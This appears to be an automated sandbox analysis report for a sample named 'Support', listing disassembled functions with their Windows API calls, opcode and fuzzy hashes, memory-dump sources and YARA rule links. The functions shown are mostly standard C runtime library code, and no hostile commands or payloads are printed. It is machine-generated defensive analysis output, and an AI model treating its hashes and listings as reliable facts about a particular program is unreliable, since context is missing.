String ID:
API String ID: 254469556-0
Opcode ID: 4864dfc1013dd0632c295c1883ae2fd53265478df7e1e197e542ca6cb8d57171
Instruction ID: 397dbf2a16bd15b8675ddb972d28ab81cd87843227d7aaad0ebc60ce76eea07b
Opcode Fuzzy Hash: 4864dfc1013dd0632c295c1883ae2fd53265478df7e1e197e542ca6cb8d57171
Instruction Fuzzy Hash: 21312A75E012289BDF21DF64D949BCDBBB8FF08304F5041AAE50CAB250EB749A85CF49

Function 00424573 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042466B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00424675
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00424682

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ebb13ee7e96e068d3a6157a9baa96ee535293255ae57a1dd2f0750aadab4a90f
Instruction ID: ff76bd3e2bc5494133992220bf5b54939ed5b93f60ada98209958710838fde64
Opcode Fuzzy Hash: ebb13ee7e96e068d3a6157a9baa96ee535293255ae57a1dd2f0750aadab4a90f
Instruction Fuzzy Hash: E031D874A012289BCB21DF64DD88B8DBBB4FF08310F5041EAE41CA7260E7749F858F49

Function 00423677 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0042364D,?,004302E0,0000000C,004237A4,?,00000002,00000000,?,00423F66,00000003,0042209F,00421AFC), ref: 00423698
TerminateProcess.KERNEL32(00000000,?,0042364D,?,004302E0,0000000C,004237A4,?,00000002,00000000,?,00423F66,00000003,0042209F,00421AFC), ref: 0042369F
ExitProcess.KERNEL32 ref: 004236B1

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 30a1150eb77c5020bdbd0a5d03789b429af761eb52d3af3de3a956e7c3d3d48c
Instruction ID: 2f1c62242b5fb4917049e0cc2b1b203c308d8f06c5353b4121e226531b0defaf
Opcode Fuzzy Hash: 30a1150eb77c5020bdbd0a5d03789b429af761eb52d3af3de3a956e7c3d3d48c
Instruction Fuzzy Hash: 3FE04F31200118AFCF226F54ED09A4A3B39FF40346F804025F90547231DB3DDD52CB98

Function 0042A495 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0042A490,?,?,00000008,?,?,0042A130,00000000), ref: 0042A6C2

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f5822b82aa768c065fb2b22e1e6ecec38a2fe8778138599a592112783a4df531
Instruction ID: f7d0f6f71498b26f2c4ef88b25a4b5d37afe8ea215a7992cde4d903099b02c5a
Opcode Fuzzy Hash: f5822b82aa768c065fb2b22e1e6ecec38a2fe8778138599a592112783a4df531
Instruction Fuzzy Hash: FBB18D312106189FD714CF28D48AB667BE0FF44364F69865AEC99CF3A1C339D9A2CB45

Function 00421BD4 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00421BEA

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 01beb44a7a53828f0f8060a3fea95883639ff3af8423dae69d4b1fb2a2cd4327
Instruction ID: 05fcd148ad34581ce6459487539c6499a0e8da555fbf5c3468bb5b7279b72665
Opcode Fuzzy Hash: 01beb44a7a53828f0f8060a3fea95883639ff3af8423dae69d4b1fb2a2cd4327
Instruction Fuzzy Hash: A7518CB5E102158BDB18CF65E9817AEBBF0FB98340F14903AC401EB364D378A941CF58

Function 00421AAC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00421300), ref: 00421AB1

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1655cef2196081041b5f808663869df5bdeaac8fe01903f15cc1900dc93ea123
Instruction ID: 5ff665e2d6ce40d5915b46b25d51da691122dd86fdc706ac2b3a40ec3fde8e84
Opcode Fuzzy Hash: 1655cef2196081041b5f808663869df5bdeaac8fe01903f15cc1900dc93ea123
Instruction Fuzzy Hash:

Function 00426893 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00426893

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: bc1e85b6a8bc718cd61b30b67a641e984d3c32400c5d5ce97d64f4be8c723188
Instruction ID: 0159376c3b8bb64deb804272349ddfebc96e277633c2b40bb652f0ffa61a9d3b
Opcode Fuzzy Hash: bc1e85b6a8bc718cd61b30b67a641e984d3c32400c5d5ce97d64f4be8c723188
Instruction Fuzzy Hash: 6FA02430300101CF4710CF307F4730C37DCD5007C070500345004C1130D77040505F05

Function 00426507 Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 0042654B

Part of subcall function 00426078: _free.LIBCMT ref: 00426095
Part of subcall function 00426078: _free.LIBCMT ref: 004260A7
Part of subcall function 00426078: _free.LIBCMT ref: 004260B9
Part of subcall function 00426078: _free.LIBCMT ref: 004260CB
Part of subcall function 00426078: _free.LIBCMT ref: 004260DD
Part of subcall function 00426078: _free.LIBCMT ref: 004260EF
Part of subcall function 00426078: _free.LIBCMT ref: 00426101
Part of subcall function 00426078: _free.LIBCMT ref: 00426113
Part of subcall function 00426078: _free.LIBCMT ref: 00426125
Part of subcall function 00426078: _free.LIBCMT ref: 00426137
Part of subcall function 00426078: _free.LIBCMT ref: 00426149
Part of subcall function 00426078: _free.LIBCMT ref: 0042615B
Part of subcall function 00426078: _free.LIBCMT ref: 0042616D

_free.LIBCMT ref: 00426540

Part of subcall function 00424869: HeapFree.KERNEL32(00000000,00000000,?,0042620D,?,00000000,?,00000000,?,00426234,?,00000007,?,?,0042669F,?), ref: 0042487F
Part of subcall function 00424869: GetLastError.KERNEL32(?,?,0042620D,?,00000000,?,00000000,?,00426234,?,00000007,?,?,0042669F,?,?), ref: 00424891

_free.LIBCMT ref: 00426562
_free.LIBCMT ref: 00426577
_free.LIBCMT ref: 00426582
_free.LIBCMT ref: 004265A4
_free.LIBCMT ref: 004265B7
_free.LIBCMT ref: 004265C5
_free.LIBCMT ref: 004265D0
_free.LIBCMT ref: 00426608
_free.LIBCMT ref: 0042660F
_free.LIBCMT ref: 0042662C
_free.LIBCMT ref: 00426644

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 906b14b6729d30d591f128711923db7622d3158cc934a930a5f30fe0c280bd5a
Instruction ID: 18effdc8793b70848e9740d0df248619691b3e8282b1658b60354892644b1563
Opcode Fuzzy Hash: 906b14b6729d30d591f128711923db7622d3158cc934a930a5f30fe0c280bd5a
Instruction Fuzzy Hash: 2F315E75700220AFDB65AA7AF845B57B3E8EF80314F95486FE049D7291DF38AC808B58

Function 00424330 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00424344

Part of subcall function 00424869: HeapFree.KERNEL32(00000000,00000000,?,0042620D,?,00000000,?,00000000,?,00426234,?,00000007,?,?,0042669F,?), ref: 0042487F
Part of subcall function 00424869: GetLastError.KERNEL32(?,?,0042620D,?,00000000,?,00000000,?,00426234,?,00000007,?,?,0042669F,?,?), ref: 00424891

_free.LIBCMT ref: 00424350
_free.LIBCMT ref: 0042435B
_free.LIBCMT ref: 00424366
_free.LIBCMT ref: 00424371
_free.LIBCMT ref: 0042437C
_free.LIBCMT ref: 00424387
_free.LIBCMT ref: 00424392
_free.LIBCMT ref: 0042439D
_free.LIBCMT ref: 004243AB

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a37356af84277ce6692d52dfdccc58255a72a5a71514e484d6c9b05664e78ae3
Instruction ID: 81d30d10d140000bb4c42be0587f86757eb65a673765510d0574e0bb7bef46cf
Opcode Fuzzy Hash: a37356af84277ce6692d52dfdccc58255a72a5a71514e484d6c9b05664e78ae3
Instruction Fuzzy Hash: EB11077A710058EFCB85FF97E842CD93B65EF84754F8140AAB9084F262DA35DE509B84

Function 00427AB4 Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,004254C8,00000000,?,?,?,00427D05,?,?,00000100), ref: 00427B0E
__alloca_probe_16.LIBCMT ref: 00427B46
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00427D05,?,?,00000100,5EFC4D8B,?,?), ref: 00427B94
__alloca_probe_16.LIBCMT ref: 00427C2B
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00427C8E
__freea.LIBCMT ref: 00427C9B

Part of subcall function 004262FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00427E5B,?,00000000,?,0042686F,?,00000004,00000000,?,?,?,00423BCD), ref: 00426331

__freea.LIBCMT ref: 00427CA4
__freea.LIBCMT ref: 00427CC9

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 2597970681-0
Opcode ID: dfe3aabeda975aee21af14a9dd9d269c5a0a0a7120eb05b535100e03045f2b21
Instruction ID: 4222db38ecf47a6694f0dfcee3db87f7581a11f487e707d97bd91ef0015fe163
Opcode Fuzzy Hash: dfe3aabeda975aee21af14a9dd9d269c5a0a0a7120eb05b535100e03045f2b21
Instruction Fuzzy Hash: 2251E372714226ABDB259F76EC41EBF77AAEB40754B95422EFC04D6240EB38DC40C698

Function 00428417 Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00428B8C,?,00000000,?,00000000,00000000), ref: 00428459
__fassign.LIBCMT ref: 004284D4
__fassign.LIBCMT ref: 004284EF
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00428515
WriteFile.KERNEL32(?,?,00000000,00428B8C,00000000,?,?,?,?,?,?,?,?,?,00428B8C,?), ref: 00428534
WriteFile.KERNEL32(?,?,00000001,00428B8C,00000000,?,?,?,?,?,?,?,?,?,00428B8C,?), ref: 0042856D

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 651858c200b320981544bd9c2d47b93d48710c2866fc15ffc7704ba5ea42cd9c
Instruction ID: 8fc57a045eac723dac1184c5f179aa355f27db7735c844777df5290f624f3e20
Opcode Fuzzy Hash: 651858c200b320981544bd9c2d47b93d48710c2866fc15ffc7704ba5ea42cd9c
Instruction Fuzzy Hash: 1251C370A01259AFDB10CFA8E881BEEBBF4EF59300F54416FE551E7291D7349941CBA8

Function 00421E00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 00421E37
___except_validate_context_record.LIBVCRUNTIME ref: 00421E3F
_ValidateLocalCookies.LIBCMT ref: 00421EC8
__IsNonwritableInCurrentImage.LIBCMT ref: 00421EF3
_ValidateLocalCookies.LIBCMT ref: 00421F48

Strings

csm, xrefs: 00421EDD

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 545fac2eee73e7f778febf9562c5cf35a77ed4930bb019a6b185f56bf9fe8ff0
Instruction ID: 3135a44741a11daae88ed409f2efd5ffbbfb407b6521e203290ba72f424a9aff
Opcode Fuzzy Hash: 545fac2eee73e7f778febf9562c5cf35a77ed4930bb019a6b185f56bf9fe8ff0
Instruction Fuzzy Hash: 9141E734B00268ABCF10DF69DC41AAEBBB5BF54358F94805AEC149B361C739A911CB99

Function 0042621B Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004261DF: _free.LIBCMT ref: 00426208

_free.LIBCMT ref: 00426269

Part of subcall function 00424869: HeapFree.KERNEL32(00000000,00000000,?,0042620D,?,00000000,?,00000000,?,00426234,?,00000007,?,?,0042669F,?), ref: 0042487F
Part of subcall function 00424869: GetLastError.KERNEL32(?,?,0042620D,?,00000000,?,00000000,?,00426234,?,00000007,?,?,0042669F,?,?), ref: 00424891

_free.LIBCMT ref: 00426274
_free.LIBCMT ref: 0042627F
_free.LIBCMT ref: 004262D3
_free.LIBCMT ref: 004262DE
_free.LIBCMT ref: 004262E9
_free.LIBCMT ref: 004262F4

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
Instruction ID: ad84a970c5e8ca50a75381925a85314b9d321e750f160038033c8cb5113db388
Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
Instruction Fuzzy Hash: C6118131740B34AAD560B7B2EC07FDB779C9F80704FC14C2EB69AA6093DA6DBA144654

Function 004223D1 Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,004223C8,0042209F,00421AFC), ref: 004223DF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004223ED
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00422406
SetLastError.KERNEL32(00000000,004223C8,0042209F,00421AFC), ref: 00422458

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 93c16dee97f0054819986c5814c0f6fb062113a0d3ae3c0f204435a068f86186
Instruction ID: 4d070fe6c5dacad50d57a85b6a77dc495ce5f9e8e8f2cf9da3281da4f669a525
Opcode Fuzzy Hash: 93c16dee97f0054819986c5814c0f6fb062113a0d3ae3c0f204435a068f86186
Instruction Fuzzy Hash: A101D4333086357EB6283BB97E85A672764DB117B97A0133FF920915F4EF994C82924C

Function 00424424 Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00000008,?,00426D69,?,?,?,004304C8,0000002C,00423F34,00000016,0042209F,00421AFC), ref: 00424428
_free.LIBCMT ref: 0042445B
_free.LIBCMT ref: 00424483
SetLastError.KERNEL32(00000000), ref: 00424490
SetLastError.KERNEL32(00000000), ref: 0042449C
_abort.LIBCMT ref: 004244A2

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: ecd3d1b4e9534616300a3151e60887558ced9743c9939c7ced4954df31f8c393
Instruction ID: da134cac1f0f1e4cec5cd0cb8ce1c4a4007a66ff92603b390153eecf34c7e388
Opcode Fuzzy Hash: ecd3d1b4e9534616300a3151e60887558ced9743c9939c7ced4954df31f8c393
Instruction Fuzzy Hash: AFF02D35700670A6C626B7367C05F2B2729DBC17B5BA0452BF528D2291EF6C8802416D

Function 004236FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004236AD,?,?,0042364D,?,004302E0,0000000C,004237A4,?,00000002), ref: 0042371C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042372F
FreeLibrary.KERNEL32(00000000,?,?,?,004236AD,?,?,0042364D,?,004302E0,0000000C,004237A4,?,00000002,00000000), ref: 00423752

Strings

mscoree.dll, xrefs: 00423715
CorExitProcess, xrefs: 00423727

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c1a8c8ea7e36bc6349b39ad18b02e575d15cfdbf540effd7a402bb9521f1e066
Instruction ID: b0479093a931e571798b453db4e75691225aae643e702cefa6c81b036737d0d5
Opcode Fuzzy Hash: c1a8c8ea7e36bc6349b39ad18b02e575d15cfdbf540effd7a402bb9521f1e066
Instruction Fuzzy Hash: C0F04470B00218BBCB155F90EC49BAEBFF4EF44756F944065F905A2260DB385A45CAD8

Function 0042634D Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,004254C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 0042639A
__alloca_probe_16.LIBCMT ref: 004263D2
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00426423
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00426435
__freea.LIBCMT ref: 0042643E

Part of subcall function 004262FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00427E5B,?,00000000,?,0042686F,?,00000004,00000000,?,?,?,00423BCD), ref: 00426331

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 1857427562-0
Opcode ID: c6fa5d3269518c18361537298e12ebe23256c86c1055f3ac8e8428425973ea86
Instruction ID: 4973e51f391595ed3c548197412071b21bbb65666c7e54d6cbbd7f1963fc4d1f
Opcode Fuzzy Hash: c6fa5d3269518c18361537298e12ebe23256c86c1055f3ac8e8428425973ea86
Instruction Fuzzy Hash: 6B31E232B0012AABDB25DF65EC41DAF7BA5EF00314F95416AFC14D6250D739CD51CBA8

Function 0042561E Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00425627
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042564A

Part of subcall function 004262FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00427E5B,?,00000000,?,0042686F,?,00000004,00000000,?,?,?,00423BCD), ref: 00426331

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00425670
_free.LIBCMT ref: 00425683
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00425692

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
String ID:
API String ID: 2278895681-0
